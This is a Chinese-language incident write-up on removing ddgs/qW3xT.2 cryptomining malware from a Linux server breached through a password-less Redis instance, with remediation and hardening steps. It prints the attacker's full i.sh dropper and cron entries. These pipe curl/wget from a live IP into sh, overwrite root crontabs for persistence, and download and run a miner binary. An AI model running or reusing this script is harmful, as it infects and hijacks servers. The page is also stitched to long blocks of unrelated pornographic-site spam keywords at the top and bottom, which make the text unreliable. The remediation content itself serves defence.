婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄

linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄

熱門標簽:昆明外呼系統 臨汾電銷機器人費用 地圖標注需要提交啥資料入駐 400電話申請找哪家公司 七大洲地圖標注 地圖標注w是什么方向 河南省鄭州市地圖標注 福州呼叫中心外呼系統哪家好 新鄉人工智能電話機器人加盟

前言

隨著虛擬貨幣的瘋狂炒作,挖礦病毒已經成為不法分子利用最為頻繁的攻擊方式之一。病毒傳播者可以利用個人電腦或服務器進行挖礦,具體現象為電腦CPU占用率高,C盤可使用空間驟降,電腦溫度升高,風扇噪聲增大等問題。

本文主要介紹的是關于linux植入ddgs、qW3xT.2挖礦病毒的處理方法,下面話不多說了,來一起看看詳細的介紹吧

被入侵后的現象:

發現有qW3xT.2與ddgs兩個異常進程,消耗了較高的cpu,kill掉后 過一會就會重新出現。

kill 掉這兩個異常進程后,過一段時間看到了如下進程:

首先在/etc/sysconfig/crotnab中的定時任務沒有找到定時腳本,輸入crontab -e 在其中找到了該定時任務

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
<span style="font-size: 15px;">查詢了下149.56.106.215在美國,i.sh 腳本內容如下:</span>
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
 wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

處理方法:

1.刪除  crontab -e 中

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2.清除/root/.ssh/authorized_keys 中黑客設置的免密登錄內容

3.修改redis密碼

4.修改root與登錄賬戶密碼

安全建議:

1.配置bind選項,限定可以連接Redis服務器的IP,修改 Redis 的默認端口6379 配置認證,也就是AUTH,設置密碼,密碼會以明文方式保存在Redis配置文件中

2.配置rename-command 配置項 “RENAME_CONFIG”,這樣即使存在未授權訪問,也能夠給攻擊者使用config 指令加大難度

3.如果可以在防火墻中屏蔽redis外網      

入侵方式:

收集了相關資料,了解到其是利用redis漏洞,未設置密碼或密碼太簡單,導致的被入侵。具體方式可以參考

https://www.jb51.net/article/147375.htm

reids修改密碼方法如下:

redis-cli -h 127.0.0.1 -p 6379
config get requirepass ##獲取當前密碼
config set requirepass "yourpassword" ##設置當前密碼,服務重新啟動后又會置為默認,即無密碼;

永久生效方法為,打開redis配置文件redis.conf,找到requirepass值修改密碼,如下:

requirepass yourpassword ##此處注意,行前不能有空格

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對腳本之家的支持。

標簽:岳陽 股票 四川 海口 鎮江 烏海 臨沂 紅河

巨人網絡通訊聲明:本文標題《linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄》,本文關鍵詞  linux,服務器,被,植入,ddgs,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄》相關的同類信息!
  • 本頁收集關于linux服務器被植入ddgs、qW3xT.2挖礦病毒的處理實戰記錄的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    美国十次了思思久久精品导航| 一区二区三区四区在线| 亚洲18女电影在线观看| 99精品欧美一区二区蜜桃免费| 亚洲精品在线电影| 亚洲成人一区二区在线观看| 首页国产欧美日韩丝袜| 日本欧美大码aⅴ在线播放| 91精品福利在线一区二区三区 | 肉丝袜脚交视频一区二区| 日本不卡一区二区三区高清视频| 久久精品无码一区二区三区| 国产精品美女久久久久久2018| 97se亚洲国产综合自在线不卡| 久久99精品久久久久久久久久久久| 亚洲小少妇裸体bbw| 日本欧美韩国一区三区| 婷婷综合另类小说色区| 国产精品久久久久久久久久久免费看| 色综合中文字幕国产 | 亚洲成年人影院| 麻豆成人综合网| 日韩vs国产vs欧美| 国产福利一区在线| 不卡视频一二三四| 欧美va在线播放| 欧美美女直播网站| 亚洲成人一二三| 色www精品视频在线观看| 欧美xfplay| 在线区一区二视频| 色一情一伦一子一伦一区| 奇米影视一区二区三区小说| 国产a区久久久| 欧美一区二区视频在线观看| 亚洲一区av在线| 99re6这里只有精品视频在线观看| 色中色一区二区| 亚洲视频一二区| 依依成人精品视频| 国产亚洲一区字幕| 99精品视频在线观看| 精品一区二区在线观看| 国产精品二三区| 久久午夜色播影院免费高清 | 欧美人妖巨大在线| 高清视频一区二区| 亚洲午夜影视影院在线观看| 精品免费国产二区三区| 在线欧美日韩精品| 日本va欧美va精品| 亚洲自拍偷拍网站| 国产亚洲女人久久久久毛片| 日韩一区二区三区免费看| 69堂精品视频| 久久国产精品免费| 精品国产123| 99视频在线精品| 中文字幕第一区二区| 欧美视频一区二区三区四区| 午夜视频一区二区三区| 久久影视一区二区| 国产69精品久久久久777| 久久综合av免费| 色婷婷亚洲婷婷| 日韩精品欧美精品| 国产精品高潮呻吟久久| jiyouzz国产精品久久| 免费不卡在线视频| 久久免费电影网| 欧美日韩和欧美的一区二区| 日本在线播放一区二区三区| 欧美激情资源网| 色琪琪一区二区三区亚洲区| 久草这里只有精品视频| 国产精品每日更新| 2023国产精品| 色天使色偷偷av一区二区 | 中文字幕在线不卡国产视频| 欧美色综合天天久久综合精品| 日韩成人免费电影| 亚洲欧美二区三区| 欧美一级片在线看| av一区二区三区四区| 亚洲成人精品影院| 亚洲欧美色一区| 精品国产乱码久久久久久老虎| 欧美一区二区视频在线观看2020 | 国产精品卡一卡二卡三| 欧美亚洲动漫另类| 成人精品小蝌蚪| 丝袜美腿亚洲一区二区图片| 亚洲激情图片qvod| 欧美成人猛片aaaaaaa| 在线视频国产一区| 成人爱爱电影网址| 国产盗摄精品一区二区三区在线| 亚洲啪啪综合av一区二区三区| 日韩精品自拍偷拍| 欧美午夜电影网| 韩国视频一区二区| 日韩电影在线观看一区| 亚洲午夜精品网| 中文字幕中文字幕中文字幕亚洲无线| 青娱乐精品视频在线| 亚洲综合免费观看高清完整版 | 国产欧美一区视频| 成人免费在线播放视频| 亚洲丶国产丶欧美一区二区三区| 日韩精品乱码免费| 丁香网亚洲国际| 91久久精品一区二区二区| 日韩欧美的一区| 国产欧美一区二区精品性| 亚洲精选视频在线| 美女视频黄频大全不卡视频在线播放| 国产电影一区二区三区| 99久久婷婷国产综合精品| 91精品免费在线| 久久影视一区二区| 五月综合激情网| 国产一区欧美日韩| 欧美精品自拍偷拍动漫精品| 26uuu精品一区二区| 伊人色综合久久天天人手人婷| 蜜臀国产一区二区三区在线播放 | 亚洲成人1区2区| 国产传媒一区在线| 欧美性色黄大片手机版| www激情久久| 日本不卡在线视频| 成人午夜av电影| 26uuu精品一区二区| 一区二区三区欧美日| 国产精品亚洲专一区二区三区| 欧洲av一区二区嗯嗯嗯啊| 欧美韩国日本一区| 婷婷成人激情在线网| 91国产视频在线观看| 久久久久久**毛片大全| 午夜精品福利在线| 99综合电影在线视频| 国产欧美日韩在线| 日韩av一区二区三区四区| 欧美色图激情小说| 国产精品成人在线观看| 国产成人综合在线| 日本高清不卡视频| 亚洲国产精品久久人人爱| 狠狠色丁香婷婷综合久久片| 91看片淫黄大片一级在线观看| 懂色av一区二区三区免费观看| 欧美揉bbbbb揉bbbbb| 日韩视频123| 悠悠色在线精品| 麻豆成人av在线| 色婷婷av一区二区三区软件 | 久久精品72免费观看| 日韩欧美一区二区不卡| 亚洲一二三区在线观看| 色www精品视频在线观看| 中文字幕第一区二区| 成人av电影免费观看| 精品成人私密视频| 国产剧情一区在线| 337p亚洲精品色噜噜| 偷拍一区二区三区| 在线免费精品视频| 婷婷亚洲久悠悠色悠在线播放| 日本精品一级二级| 亚洲国产一区在线观看| 91在线免费看| 亚洲国产婷婷综合在线精品| 99久久99久久综合| 亚洲大片在线观看| 99精品久久只有精品| 亚洲国产精品一区二区久久恐怖片 | 成人自拍视频在线| 日韩欧美国产一二三区| 成人免费在线播放视频| 成人av网址在线| 欧美大度的电影原声| 日本不卡视频在线| 不卡的av中国片| 国产精品免费免费| 精品一区二区三区免费毛片爱| 日韩免费视频一区二区| 欧美韩国一区二区| 成人精品一区二区三区四区 | 成人国产精品免费观看动漫| 国产亚洲女人久久久久毛片| 久久99国产乱子伦精品免费| 欧美日韩你懂的| 婷婷中文字幕综合| 在线看一区二区| 亚洲国产sm捆绑调教视频 | 国产精品理论片在线观看| 国产精品一色哟哟哟| 日本一区二区三区视频视频| 美女视频黄 久久|